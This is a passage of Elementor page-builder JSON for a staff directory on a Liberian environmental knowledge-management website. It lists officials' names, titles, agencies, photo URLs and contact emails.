href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d8ecb8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2022\\/09\\/Halala.jpg\",\"id\":5086,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9ff3a4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/reeves.png\",\"id\":3635}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1c050c1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/willabo.png\",\"id\":3636}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ddcc6df\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/kullie.png\",\"id\":3637}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a688b4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2022\\/09\\/ernest.jpg\",\"id\":5087,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc8ab59\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Kullie<\\/strong><br \\/>Director of LHS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"571bd4b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ernest M. Menseah <\\/strong><br \\/>Director of LGS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"976bac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wonpue Quellian <\\/strong><br \\/>Research Officer<br \\/>MME<br \\/><a href=\\\"mailto:wonpuequellian2017@gmail.com\\\">wonpuequellian2017@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27df91b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7132bc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a594c07\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"861733c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<br \\/><a href=\\\"&quot;mailto:stephenlavalah@yahoo.com\\\">stephenlavalah@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0080713\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3fc1d16\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/sherman.png\",\"id\":3644}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"758c067\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/borbor.png\",\"id\":3646}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"369beaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Albert M. Sherman <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:itssherman@gmail.com\\\">itssherman@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e5b0622\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Amos Borbor <\\/strong><br \\/>Finance &amp; Administrative Officer<br \\/>MOT<br \\/><a href=\\\"mailto:felixborbor@gmail.com\\\">felixborbor@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58a8bc8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/simpson.png\",\"id\":3651}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c7ec2c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry A. Simpson <\\/strong><br \\/>Weather Forecaster<br \\/>MOT<br \\/><a href=\\\"mailto:ransford2024@gmail.com\\\">ransford2024@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c5ecaba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>James Kollie <\\/strong><br \\/>MOT<br \\/><a 